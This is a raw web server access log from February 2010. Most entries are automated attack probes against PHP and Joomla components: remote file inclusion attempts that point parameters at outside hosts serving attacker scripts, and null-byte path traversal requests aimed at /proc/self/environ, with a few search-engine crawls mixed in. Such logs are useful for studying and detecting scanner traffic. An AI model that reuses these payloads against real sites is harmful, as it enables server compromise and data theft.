95.211.7.129 - - [05/Feb/2010:21:32:13 -0600] "GET /logs/access_log.1257897600//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:32:15 -0600] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 223414 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:33:07 -0600] "GET /logs/access_log.1259366400/?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:33:07 -0600] "GET /?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:33:08 -0600] "GET /logs/access_log.1259366400/?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:33:08 -0600] "GET /?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:33:09 -0600] "GET /logs/?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 223409 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:33:10 -0600] "GET /logs/?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 223409 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:35:06 -0600] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:35:06 -0600] "GET /logs/access_log.1243728000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:35:10 -0600] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:35:28 -0600] "GET /logs/access_log.1248480000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
202.12.74.244 - - [05/Feb/2010:21:35:47 -0600] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 200 3233 "-""Mozilla/5.0"
202.12.74.244 - - [05/Feb/2010:21:35:47 -0600] "GET /logs/access_log.1247356800/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 298 "-""Mozilla/5.0"
202.12.74.244 - - [05/Feb/2010:21:35:47 -0600] "GET /logs/access_log.1231718400/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 298 "-""Mozilla/5.0"
202.12.74.244 - - [05/Feb/2010:21:35:50 -0600] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 200 223019 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:36:01 -0600] "GET /?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:36:01 -0600] "GET /logs/access_log.1259366400%20%20/?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:21:36:02 -0600] "GET /logs/access_log.1249862400/announcements.php?phpraid_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:21:36:02 -0600] "GET /logs/access_log.1249862400/announcements.php?phpraid_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:21:36:02 -0600] "GET /logs/access_log.1250640000/announcements.php?phpraid_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:21:36:02 -0600] "GET /logs/announcements.php?phpraid_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:21:36:02 -0600] "GET /announcements.php?phpraid_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:21:36:02 -0600] "GET /announcements.php?phpraid_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:21:36:02 -0600] "GET /logs/announcements.php?phpraid_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
203.247.66.177 - - [05/Feb/2010:21:36:02 -0600] "GET /logs/access_log.1250640000/announcements.php?phpraid_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:36:03 -0600] "GET /logs/?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 223409 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:36:52 -0600] "GET /logs/access_log.1259366400%20%20/?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:36:52 -0600] "GET /?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
95.211.7.129 - - [05/Feb/2010:21:36:53 -0600] "GET /logs/?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 200 223409 "-""Mozilla/5.0"
60.251.165.181 - - [05/Feb/2010:21:37:03 -0600] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
60.251.165.181 - - [05/Feb/2010:21:37:03 -0600] "GET /logs/access_log.1247616000/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
60.251.165.181 - - [05/Feb/2010:21:37:03 -0600] "GET /logs/access_log.1250380800/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
60.251.165.181 - - [05/Feb/2010:21:37:03 -0600] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.189.18.93 - - [05/Feb/2010:21:37:22 -0600] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.189.18.93 - - [05/Feb/2010:21:37:22 -0600] "GET /logs/access_log.1231718400/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.18.93 - - [05/Feb/2010:21:37:22 -0600] "GET /logs/access_log.1247356800/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.18.93 - - [05/Feb/2010:21:37:25 -0600] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 223409 "-""Mozilla/5.0"
60.251.165.181 - - [05/Feb/2010:21:37:25 -0600] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
60.251.165.181 - - [05/Feb/2010:21:37:25 -0600] "GET /logs/access_log.1250380800/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
60.251.165.181 - - [05/Feb/2010:21:37:25 -0600] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
60.251.165.181 - - [05/Feb/2010:21:37:25 -0600] "GET /logs/access_log.1247616000/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.ukprintservices.co.uk//administrator/components/com_search/models/templates/id1(feelcomz).txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.189.18.93 - - [05/Feb/2010:21:37:29 -0600] "GET /logs/access_log.1231718400/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.18.93 - - [05/Feb/2010:21:37:32 -0600] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.189.18.93 - - [05/Feb/2010:21:37:32 -0600] "GET /logs/access_log.1247356800/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.189.18.93 - - [05/Feb/2010:21:37:35 -0600] "GET /logs/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 223409 "-""Mozilla/5.0"
65.55.207.134 - - [05/Feb/2010:21:39:30 -0600] "GET /logs/access_log.1125964800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.181.7.63 - - [05/Feb/2010:21:40:17 -0600] "GET /logs/access_log.1234915200 HTTP/1.1" 200 111970 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.208.148.31 - - [05/Feb/2010:21:40:44 -0600] "GET /logs/access_log.1230163200//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.208.148.31 - - [05/Feb/2010:21:40:44 -0600] "GET /logs//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.208.148.31 - - [05/Feb/2010:21:40:44 -0600] "GET //errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.39.145.146 - - [05/Feb/2010:21:41:44 -0600] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:41:45 -0600] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:41:45 -0600] "GET /logs/access_log.1243728000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:41:45 -0600] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:41:45 -0600] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:41:49 -0600] "GET /logs/access_log.1243728000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:41:55 -0600] "GET /logs/access_log.1248480000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
84.38.160.77 - - [05/Feb/2010:21:42:23 -0600] "GET //errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
84.38.160.77 - - [05/Feb/2010:21:42:23 -0600] "GET /logs//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
84.38.160.77 - - [05/Feb/2010:21:42:23 -0600] "GET /logs/access_log.1230163200//errors.php?error=http://www.cashondemand.co.za/templates/id.txt???%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.76"
211.39.145.146 - - [05/Feb/2010:21:42:29 -0600] "GET /logs/access_log.1248480000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:42:33 -0600] "GET /logs/access_log.1243728000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:42:33 -0600] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:42:36 -0600] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.39.145.146 - - [05/Feb/2010:21:42:45 -0600] "GET /logs/access_log.1248480000/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 359 "-""Mozilla/5.0"
186.28.232.13 - - [05/Feb/2010:21:44:25 -0600] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
186.28.232.13 - - [05/Feb/2010:21:44:25 -0600] "GET //errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
65.55.37.203 - - [05/Feb/2010:21:45:03 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.37.203 - - [05/Feb/2010:21:45:44 -0600] "GET / HTTP/1.1" 200 3245 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.97.191.153 - - [05/Feb/2010:21:47:22 -0600] "GET //citywriter/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.97.191.153 - - [05/Feb/2010:21:47:22 -0600] "GET /logs//citywriter/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
121.97.191.153 - - [05/Feb/2010:21:47:33 -0600] "GET /logs/access_log.1244073600//citywriter/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.46.199.180 - - [05/Feb/2010:21:47:52 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
109.169.177.18 - - [05/Feb/2010:21:50:52 -0600] "GET /logs/access_log.1264118400 HTTP/1.1" 200 32768 "http://yandex.ru/yandsearch?clid=9582&text=p.gs/lovesex&lr=51""Opera/9.27 (Windows NT 5.1; U; ru)"
83.220.144.69 - - [05/Feb/2010:21:51:03 -0600] "GET /logs//common/db.php?commonpath=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""-"
83.220.144.69 - - [05/Feb/2010:21:51:03 -0600] "GET //common/db.php?commonpath=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""-"
83.220.144.69 - - [05/Feb/2010:21:51:29 -0600] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:21:51:29 -0600] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:21:51:32 -0600] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:21:51:33 -0600] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
109.169.177.18 - - [05/Feb/2010:21:51:52 -0600] "GET /logs/access_log.1264118400 HTTP/1.1" 200 1179283 "http://yandex.ru/yandsearch?clid=9582&text=p.gs/lovesex&lr=51""Opera/9.27 (Windows NT 5.1; U; ru)"
65.55.107.181 - - [05/Feb/2010:21:51:59 -0600] "GET /logs/access_log.1241740800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.220.144.69 - - [05/Feb/2010:21:52:02 -0600] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:21:52:02 -0600] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
58.150.99.131 - - [05/Feb/2010:21:52:24 -0600] "GET /logs/access_log.1228608000%20%20///delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
58.150.99.131 - - [05/Feb/2010:21:52:24 -0600] "GET ///delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
58.150.99.131 - - [05/Feb/2010:21:52:24 -0600] "GET /logs///delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
58.150.99.131 - - [05/Feb/2010:21:52:27 -0600] "GET /logs///delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
58.150.99.131 - - [05/Feb/2010:21:52:27 -0600] "GET ///delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
58.150.99.131 - - [05/Feb/2010:21:52:27 -0600] "GET /logs/access_log.1228608000%20%20///delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
67.228.111.219 - - [05/Feb/2010:21:52:32 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
67.228.111.219 - - [05/Feb/2010:21:52:32 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
207.45.176.226 - - [05/Feb/2010:21:52:34 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
207.45.176.226 - - [05/Feb/2010:21:52:34 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
74.86.204.22 - - [05/Feb/2010:21:52:40 -0600] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
74.86.204.22 - - [05/Feb/2010:21:52:40 -0600] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
207.45.176.226 - - [05/Feb/2010:21:52:43 -0600] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
121.97.191.153 - - [05/Feb/2010:21:52:44 -0600] "GET /logs/access_log.1250553600//citywriter/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.45.176.226 - - [05/Feb/2010:21:52:44 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
67.228.111.219 - - [05/Feb/2010:21:52:44 -0600] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
67.228.111.219 - - [05/Feb/2010:21:52:44 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
121.97.191.153 - - [05/Feb/2010:21:52:44 -0600] "GET /logs/access_log.1254441600//citywriter/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.228.111.219 - - [05/Feb/2010:21:52:49 -0600] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
67.228.111.219 - - [05/Feb/2010:21:52:50 -0600] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:21:52:51 -0600] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:21:52:51 -0600] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
74.86.204.22 - - [05/Feb/2010:21:52:51 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
74.86.204.22 - - [05/Feb/2010:21:52:51 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:21:53:06 -0600] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:21:53:06 -0600] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:21:53:08 -0600] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
83.220.144.69 - - [05/Feb/2010:21:53:09 -0600] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
58.150.99.131 - - [05/Feb/2010:21:53:24 -0600] "GET /logs/access_log.1230163200%20%20///delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
58.150.99.131 - - [05/Feb/2010:21:53:27 -0600] "GET /logs/access_log.1230163200%20%20///delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
78.46.10.12 - - [05/Feb/2010:21:54:20 -0600] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
78.46.10.12 - - [05/Feb/2010:21:54:20 -0600] "GET //?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
78.46.10.12 - - [05/Feb/2010:21:54:21 -0600] "GET /logs//?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 200 223414 "-""Mozilla/5.0"
74.86.204.22 - - [05/Feb/2010:21:54:25 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
74.86.204.22 - - [05/Feb/2010:21:54:25 -0600] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
67.228.111.219 - - [05/Feb/2010:21:54:29 -0600] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
67.228.111.219 - - [05/Feb/2010:21:54:29 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
67.228.111.219 - - [05/Feb/2010:21:54:41 -0600] "GET /logs//tags.php?BBCodeFile=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""-"
67.228.111.219 - - [05/Feb/2010:21:54:42 -0600] "GET //tags.php?BBCodeFile=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""-"
83.220.144.69 - - [05/Feb/2010:21:55:03 -0600] "GET /logs/index.php?oldal=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""-"
83.220.144.69 - - [05/Feb/2010:21:55:03 -0600] "GET /index.php?oldal=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""-"
83.220.144.69 - - [05/Feb/2010:21:55:12 -0600] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
83.220.144.69 - - [05/Feb/2010:21:55:13 -0600] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
64.34.162.82 - - [05/Feb/2010:21:55:29 -0600] "GET //tags.php?BBCodeFile=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""-"
64.34.162.82 - - [05/Feb/2010:21:55:30 -0600] "GET /logs//tags.php?BBCodeFile=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""-"
207.45.176.226 - - [05/Feb/2010:21:55:30 -0600] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
207.45.176.226 - - [05/Feb/2010:21:55:30 -0600] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
121.97.191.153 - - [05/Feb/2010:21:55:33 -0600] "GET /logs//citywriter/head.php?path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
